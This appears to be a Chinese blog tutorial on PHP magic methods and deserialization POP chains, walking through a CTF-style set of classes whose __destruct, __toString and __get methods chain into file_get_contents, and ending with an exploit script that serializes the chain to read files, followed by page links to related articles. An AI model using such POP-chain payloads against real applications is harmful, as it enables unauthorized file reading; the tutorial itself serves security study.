class Person {

    private $name;

    private $sex;

    private $age;

    //__set()方法用来设置私有属性

    function __set($property_name, $value) {

        echo "在直接设置私有属性值的时候,自动调用了这个 __set() 方法为私有属性赋值<br />";

        $this->$property_name = $value;

    }

    //__get()方法用来获取私有属性

    function __get($property_name) {

        echo "在直接获取私有属性值的时候,自动调用了这个 __get() 方法<br />";

        echo $property_name;

        // return isset($this->$property_name) ? $this->$property_name : null;

    }

}

$p1=new Person();

//直接为私有属性赋值的操作, 会自动调用 __set() 方法进行赋值

// $p1->name = "张三";

//直接获取私有属性的值, 会自动调用 __get() 方法,返回成员属性的值

// echo "我的名字叫:".$p1->name;

echo $p1->aaaaa;

echo "<br>";

构造pop时,当访问一个不存在的属性的时候,会直接调用__get方法,并将aaaaa变量传递给__get方法中$property_name中。



看如下代码构造反序列化漏洞:

class C1e4r

{

    public $test;

    public $str;

    public function __construct($name)

    {

        $this->str = $name;

    }

    public function __destruct()

    {

        $this->test = $this->str;

        echo "执行了C1e4r的destruct"."<br>";

        echo $this->test;

    }

}

class Show

{

    public $source;

    public $str;

    public function __construct($file)

    {

        $this->source = $file;

        echo $this->source;

    }

    public function __toString()

    {

  //   	$a = new Test();

		// $a->params = array("source"=>'http://www.baidu.com');

		// $b = new Show('index.php');

		// $b->str['str'] = $a;

    	echo "执行了Show的toString"."<br>";

        $content = $this->str['str']->source;

        return $content;

    }

    public function __set($key,$value)

    {

        $this->$key = $value;

    }

    public function _show()

    {

        if(preg_match('/http|https|file:|gopher|dict|\.\.|f1ag/i',$this->source)) {

            die('hacker!');

        } else {

            highlight_file($this->source);

        }

    }

    public function __wakeup()

    {

        if(preg_match("/http|https|file:|gopher|dict|\.\./i", $this->source)) {

            echo "hacker~";

            $this->source = "index.php";

        }

    }

}

class Test

{

    public $file;

    public $params;

    public function __construct()

    {

        $this->params = array();

    }

    public function __get($key)

    {

    	echo "执行了Test的get"."<br>";

    	echo "$key"."<br>";

        return $this->get($key);

    }

    public function get($key)

    {

        if(isset($this->params[$key])) {

            $value = $this->params[$key];

        } else {

            $value = "index.php";

        }

        return $this->file_get($value);

    }

    public function file_get($value)

    {

        $text = base64_encode(file_get_contents($value));

        return $text;

    }

}

向上回溯危险函数file_get->get->__get,看哪个类能够触发Test类的__get函数,发现Show类的__toString函数的$this->str['str']->source访问一个不存在的变量会调用__get方法,所以将Test类赋值给$this->str['str'],看哪个类又调用Show的__toString函数,发现C1e4r类的 __destruct魔法函数 $this->test = $this->str;echo $this->test;将Show类赋值给$this->test.就会调用__toString方法。

总结:

1.利用C1e4r类的__destruct()中的echo \(this->test
2.触发Show类的`__toString()`
3.利用Show类的`\)content = $this->str['str']->source 4.触发Test类的__get() 5.成功利用file_get()`读文件

exp:

$a = new Test();

$a->params = array("source"=>'http://www.baidu.com');

$b = new Show('index.php');

$b->str['str'] = $a;

$c= new C1e4r($b);

echo serialize($c);



参考链接:

https://xz.aliyun.com/t/3656#toc-1

php反序列化的好文章:

https://xz.aliyun.com/t/3674#toc-20

pop链构造的更多相关文章

  1. php反序列化之pop链构造

    本题是某信有一次内部比赛的题目,涉及到pop链的构造问题,所以在这里与大家分享一下 题目 查看源码 逻辑是当参数fn存在且不包含string.zlib.flag这三个字符串时,进行文件包含这里的过滤是 ...

  2. PHP审计之POP链挖掘

    PHP审计之POP链挖掘 前言 续上文中的php反序列化,继续来看,这个POP的挖掘思路.在其中一直构思基于AST去自动化挖掘POP链,迫于开发能力有限.没有进展,随后找到了一个别的师傅已经实现好的项 ...

  3. 2019强网杯web upload分析(pop链)

    参考链接:https://blog.csdn.net/qq_41173457/article/details/90724943 注意 只要namespace相同那就可以直接实例化同一namespace ...

  4. Smarty 3.1.34 反序列化POP链(任意文件删除)

    Smarty <= 3.1.34,存在任意文件删除的POP链. Exp: <?php class Smarty_Internal_Template { public $smarty = n ...

  5. Codeforces 1082 D. Maximum Diameter Graph-树的直径-最长链-构造题 (Educational Codeforces Round 55 (Rated for Div. 2))

    D. Maximum Diameter Graph time limit per test 2 seconds memory limit per test 256 megabytes input st ...

  6. CTF-安恒19年一月月赛部分writeup

    CTF-安恒19年一月月赛部分writeup MISC1-赢战2019 是一道图片隐写题 linux下可以正常打开图片,首先到binwalk分析一下. 里面有东西,foremost分离一下 有一张二维 ...

  7. 浅谈PHP反序列化漏洞原理

    序列化与反序列化 序列化用途:方便于对象在网络中的传输和存储 0x01 php反序列化漏洞 在PHP应用中,序列化和反序列化一般用做缓存,比如session缓存,cookie等. 常见的序列化格式: ...

  8. GYCTF easyphp 【反序列化配合字符逃逸】

    基础知识可以参考我之前写的那个 0CTF 2016 piapiapia  那个题只是简单记录了一下,学习了一下php反序列化的思路 https://www.cnblogs.com/tiaopideju ...

  9. 初识phar反序列化&&复现bytectf_2019_easycms&&RSS思路

    概要 来自Secarma的安全研究员Sam Thomas发现了一种新的漏洞利用方式,可以在不使用php函数unserialize()的前提下,引起严重的php对象注入漏洞.这个新的攻击方式被他公开在了 ...

随机推荐

  1. Spring.Net---4、IoC/DI注入方式

    spring.net里实现了控制反转IOC(Inversion of control),也即依赖注入DI(Dependency Injection),以达到解耦的目的,实现模块的组件化.程序在调用sp ...

  2. JavaScript三大对象详细解说

    Js三大对象 一 浏览器对象 浏览器窗口.文档document.URL地址等 常用的浏览器对象: 浏览器对象的分层结构 Window对象 (1) 属性 名称 说明 document 表示给定浏览器窗口 ...

  3. 今天瞎写的关于XML的一些。

    using System;using System.Windows.Forms;using System.Xml; namespace winformDemo{    public partial c ...

  4. shortcut icon和icon代码的区别介绍

    语句一: <link rel="shortcut icon" href="favicon.ico" /> 语句二: <link rel=&qu ...

  5. ssm集成redis

    身在一个传统的IT公司,接触的新技术比较少,打算年后跳槽,所以抽空学了一下redis. 简单的redis测试,咱们这边就不讲了,现在主要讲讲ssm集成redis的过程,因为现在项目用的就是ssm的框架 ...

  6. java二叉搜索树原理与实现

    计算机里面的数据结构 树 在计算机存储领域应用作用非常大,我之前也多次强调多磁盘的存取速度是目前计算机飞速发展的一大障碍,计算机革命性的的下一次飞跃就是看硬盘有没有质的飞跃,为什么这么说?因为磁盘是永 ...

  7. UNIX IPC: POSIX 消息队列

    首先在我的MAC OSX上试了一下虽然有_POSIX_MESSAGE_PASSING的宏定义,但是用gcc编译会提示没有mqueue.h头文件,先放一边.在Ubuntu上使用正常,不过POSIX消息队 ...

  8. js delete 操作符

    delete操作符很陌生,很少会用到,但是既然碰到了,就mark一下: delete 操作符用于删除一个对象的属性: 注意点:只能删除自己的属性,从原型链上继承的属性是无法删除的:

  9. python迭代器 生成器 三元运算 列表解析

    1.迭代器 迭代器是访问集合元素的一种方式.迭代器对象从集合的第一个元素开始访问,直到所有的元素被访问完结束.迭代器只能往前不会后退,不过这也没什么,因为人们很少在迭代途中往后退.另外,迭代器的一大优 ...

  10. 【Python系列】Python包管理器pip

    缘起 这段时间忙着给朋友搞事,忙了好长一段时间,木有写博客很长时间了.之间做了两个东西,一个是邮件自动发送脚本,一个是数据处理软件.其中,在做数据处理软件的时候使用到了非Python系统库,是两个第三 ...